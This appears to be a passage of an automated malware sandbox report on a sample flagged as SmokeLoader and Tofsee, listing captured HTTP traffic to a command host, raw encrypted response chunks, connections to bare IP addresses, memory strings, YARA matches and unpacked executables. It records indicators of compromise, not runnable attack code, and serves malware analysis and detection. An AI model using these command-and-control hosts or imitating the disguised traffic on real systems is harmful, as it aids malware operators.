                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 88 30 e4 00 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OV=AIS00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 37 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 53 dc 43 d2 fb 2f 82 2b eb ac 91 54 2f e0 b4 41 29 e3 b3 b6 69 f7 98 b4 58 ac 76 9f c9 39 40 59 36 09 43 df bb 56 b7 f5 5d a8 e0 8d 33 c0 3c 81 da 78 6a 3d 90 3f 67 ce 90 cd c0 3c ae 28 1e 0d 0a 30 0d 0a 0d 0a Data Ascii: 73I:82OB%,YR("XSC/+T/A)iXv9@Y6CV]3<xj=?g<(0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1a d0 4e 90 72 46 db 00 e5 ea 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OTeNrFg2P0
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: svchost.exe, 0000001D.00000003.442194448.000001A704385000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.442084941.000001A70437D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.441081784.000001A70439F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 0000001D.00000003.442194448.000001A704385000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.442084941.000001A70437D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.441081784.000001A70439F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doekvpclh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49790 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.3:49874 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49891 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49918 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49924 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49933 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 17.0.iscgwer.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.iscgwer.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.iscgwer.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.53DC.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.9ro85QVN0F.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.53DC.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.1.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.1.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.iscgwer.5615a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.340237120.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.326990095.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.420944310.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.420623827.0000000000430000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.340386924.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.395898272.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.395779805.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: 9ro85QVN0F.exe, 00000000.00000002.283207152.00000000008DA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 25.3.F4CF.exe.780000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.650e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.F4CF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.458534378.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.413183404.0000000000780000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.458185502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: F4CF.exe PID: 6380, type: MEMORYSTR

                      System Summary:

                      barindex
                      PE file has nameless sectionsShow sources
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 27E3.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: 7480.exe.11.drStatic PE information: section name:
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 520
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_0042A440
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_0042B220
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00424F10
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_006331FF
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00633253
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402A5F
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_2_00402AB3
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402A5F
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 1_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 16_2_00563253
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 16_2_005631FF
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\iscgwerCode function: 17_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeCode function: 19_2_004027CA
